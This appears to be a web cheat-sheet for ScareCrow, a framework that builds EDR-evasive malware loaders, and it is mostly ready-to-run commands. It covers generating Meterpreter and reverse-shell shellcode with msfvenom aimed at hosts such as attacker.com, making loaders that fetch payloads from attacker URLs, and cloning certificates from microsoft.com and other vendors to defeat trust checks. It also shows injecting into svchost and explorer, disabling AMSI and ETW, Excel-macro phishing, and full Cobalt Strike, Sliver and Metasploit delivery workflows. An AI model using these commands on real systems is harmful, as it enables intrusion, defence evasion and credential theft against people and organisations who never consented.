ScareCrow
ScareCrow is a powerful payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.
Installation
섹션 제목: “Installation”Prerequisites
섹션 제목: “Prerequisites”# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go
# On macOS
brew install mingw-w64 osslsigncode openssl go
# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golangBuild from Source
섹션 제목: “Build from Source”# Clone ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go
# Verify installation
./ScareCrow -hQuick Install via Go
섹션 제목: “Quick Install via Go”# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest
# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/binQuick Start
섹션 제목: “Quick Start”Generate a basic loader from msfvenom shellcode:
# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin
# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http
# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)Loader Types
섹션 제목: “Loader Types”| Type | Flag | Description | Best For |
|---|---|---|---|
| Binary | -Loader binary | Standalone executable | Direct execution, reverse shells |
| DLL | -Loader dll | Dynamic library for sideloading | DLL injection, process hollowing |
| COM Object | -Loader control | COM control object (.scr) | Screensaver execution, UAC bypass |
| Excel Macro | -Loader excel | Excel-based delivery | Phishing documents, macro execution |
| MSIExec | -Loader msiexec | Windows Installer wrapper | Code execution via MSI, UAC bypass |
| WScript | -Loader wscript | Windows Script Host wrapper | VBScript/JScript execution, LOLBin abuse |
DLL Side-Loading Example
섹션 제목: “DLL Side-Loading Example”# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http
# Use legitimate application to load malicious DLL
# Place loader.dll next to legitimate application
# When legitimate app runs, it loads our malicious DLLExcel Macro Delivery
섹션 제목: “Excel Macro Delivery”# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com
# Creates VBA macro that executes loader
# Can be embedded in .xls/.xlsm documentsInput Formats
섹션 제목: “Input Formats”Raw Shellcode Input
섹션 제목: “Raw Shellcode Input”# Using -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com
# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.binMetasploit Integration
섹션 제목: “Metasploit Integration”# Generate shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
-f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com
# For 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
-f raw > x86.bin && ./ScareCrow -I x86.binCobalt Strike Shellcode
섹션 제목: “Cobalt Strike Shellcode”# Export from Cobalt Strike beacon
# Generate raw shellcode from beacon export
./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery httpCode Signing
섹션 제목: “Code Signing”Domain-Based Certificate Cloning
섹션 제목: “Domain-Based Certificate Cloning”# Sign with cloned certificate from domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365
# ScareCrow clones legitimate certificate from specified domain
# Creates trusted signature that bypasses SmartScreen
# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.comCertificate Options
섹션 제목: “Certificate Options”# Sign without specific domain (self-signed)
./ScareCrow -I payload.bin
# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90
# Use custom certificate (if available)
./ScareCrow -I payload.bin -domain company.comWhy Code Signing Matters
섹션 제목: “Why Code Signing Matters”Signed loaders bypass numerous defenses:
- SmartScreen warning suppression
- Code signature validation in EDRs
- Windows Defender Application Guard bypass
- Trust indicators in file properties
Encryption
섹션 제목: “Encryption”Encryption Modes
섹션 제목: “Encryption Modes”# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES
# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA
# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XORFile Size Comparison
섹션 제목: “File Size Comparison”# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES
# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA
# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XORProcess Injection
섹션 제목: “Process Injection”Injection Techniques
섹션 제목: “Injection Techniques”# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com
# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe
# Target specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exeProcess Injection Tactics
섹션 제목: “Process Injection Tactics”# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com
# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.comProcess Selection Tips
섹션 제목: “Process Selection Tips”svchost.exe- System service host (trusted)taskhostw.exe- Task Scheduler host (legitimate)explorer.exe- Windows Explorer (common)winlogon.exe- Logon process (high privilege)lsass.exe- Local Security Authority (protected)
Delivery Options
섹션 제목: “Delivery Options”HTTP Delivery
섹션 제목: “HTTP Delivery”# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
-domain microsoft.com
# Staged delivery - loader downloads payload from URL
./ScareCrow -I payload.bin -delivery httpDNS Delivery
섹션 제목: “DNS Delivery”# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com
# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructureURL-Based Delivery
섹션 제목: “URL-Based Delivery”# Specify custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
-delivery http -domain microsoft.com
# File will be downloaded from specified URL at runtimeNo Internet Delivery
섹션 제목: “No Internet Delivery”# Embed payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com
# Useful for offline or isolated environmentsEDR Evasion Techniques
섹션 제목: “EDR Evasion Techniques”ETW (Event Tracing for Windows) Patching
섹션 제목: “ETW (Event Tracing for Windows) Patching”# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw
# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rulesAMSI Bypass
섹션 제목: “AMSI Bypass”# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi
# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloadsSleep Obfuscation
섹션 제목: “Sleep Obfuscation”# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep
# Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patternsCombined Evasion
섹션 제목: “Combined Evasion”# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
-noetw -noamsi -nosleep -encryptionmode AES
# Combines multiple evasion techniques
# Most effective against modern EDR solutionsAdditional Evasion
섹션 제목: “Additional Evasion”- Direct syscall execution (bypasses hooked APIs)
- Unhooking kernel32 functions
- Hardware breakpoint detection bypass
- Sandbox evasion checks
- Timing-based detection avoidance
Advanced Options
섹션 제목: “Advanced Options”Custom Passwords
섹션 제목: “Custom Passwords”# Use custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com
# Password-protects the generated loaderConsole Output Control
섹션 제목: “Console Output Control”# Show console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com
# Hide console (default for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.comSandbox Evasion
섹션 제목: “Sandbox Evasion”# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com
# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMUFile Output Control
섹션 제목: “File Output Control”# Specify custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com
# Change output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.comComplete Workflow Examples
섹션 제목: “Complete Workflow Examples”Cobalt Strike Integration
섹션 제목: “Cobalt Strike Integration”# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin
# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
-injection process -process svchost.exe -noetw -noamsi
# 3. Host on web server
# Place loader.exe on HTTP server
# 4. Deliver via social engineering
# Email, USB, shared drive, etc.Sliver Integration
섹션 제목: “Sliver Integration”# 1. Generate Sliver implant shellcode
sliver > generate --mtls localhost --format shellcode > sliver.bin
# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
-injection self -noetw
# 3. Execute on target
# ./loader.exe (connects back to Sliver server)Metasploit Multi-Stage
섹션 제목: “Metasploit Multi-Stage”# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
LPORT=4444 -f raw > msfvenom.bin
# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
-injection process -process explorer.exe -nosleep
# 3. Set up Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploitExcel-Based Phishing
섹션 제목: “Excel-Based Phishing”# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com
# 2. Create Excel document
# Insert generated macro into Excel
# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"Troubleshooting
섹션 제목: “Troubleshooting”Build Errors
섹션 제목: “Build Errors”# Missing Go installation
# Solution: Install Go 1.16+ from golang.org
# Cannot find mingw-w64
# Solution: apt-get install mingw-w64
# openssl not found
# Solution: apt-get install opensslCompilation Failures
섹션 제목: “Compilation Failures”# "Invalid argument" error
# Solution: Check shellcode validity - ensure raw binary format
# "Certificate error" when signing
# Solution: Verify domain is reachable, has valid certificate
# File generation issues
# Solution: Check write permissions in current directoryPayload Execution Issues
섹션 제목: “Payload Execution Issues”# Loader doesn't execute
# Solution: Verify shellcode format, try different injection method
# EDR blocking execution
# Solution: Enable -noetw -noamsi -nosleep flags
# Process injection fails
# Solution: Ensure target process exists, use -injection self as fallbackSize Issues
섹션 제목: “Size Issues”# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress
# Output binary still detected
# Solution: Recombine with fresh domain signing, change encryption modeBest Practices
섹션 제목: “Best Practices”Operational Security
섹션 제목: “Operational Security”- Always use code signing with legitimate-looking domains
- Rotate domains between campaigns
- Test payloads in isolated lab environment first
- Monitor for detection patterns on target systems
- Use staged delivery when network allows
Evasion Strategy
섹션 제목: “Evasion Strategy”- Combine multiple evasion techniques (-noetw, -noamsi, -nosleep)
- Vary loader types between targets
- Use process injection into trusted system processes
- Implement sleep obfuscation for long-running operations
- Test against target’s specific EDR solution
Payload Selection
섹션 제목: “Payload Selection”- Match shellcode size to target constraints
- Use x64 when possible (64-bit Windows is default)
- Consider network bandwidth for large payloads
- Test callback connectivity before deployment
- Plan for multiple payload attempts
Post-Exploitation
섹션 제목: “Post-Exploitation”- Monitor injected process for suspicious behavior
- Use encrypted communications for C2
- Implement proper logging and audit trails
- Clean up artifacts after operation completion
- Document all activities for IR purposes
Related Tools
섹션 제목: “Related Tools”| Tool | Purpose | Use Case |
|---|---|---|
| Donut | Shellcode generation from .NET | .NET assembly execution |
| PEzor | PE obfuscation and evasion | Binary obfuscation |
| Freeze | Anti-debug and anti-analysis | Detection evasion |
| NimCrypt2 | Nim-based encryption | Alternative language approach |
| shhhloader | Shellcode loader framework | Custom loader development |
| Sliver | C2 framework alternative | Command and control |
| Cobalt Strike | Commercial C2 framework | Full-featured red team operations |
Complementary Techniques
섹션 제목: “Complementary Techniques”- Use with Atomics Red Team for evasion testing
- Combine with LOLBAS for execution
- Integrate with Covenant C2 framework
- Pair with Mimikatz for credential theft
- Deploy alongside Empire/PowerEmpire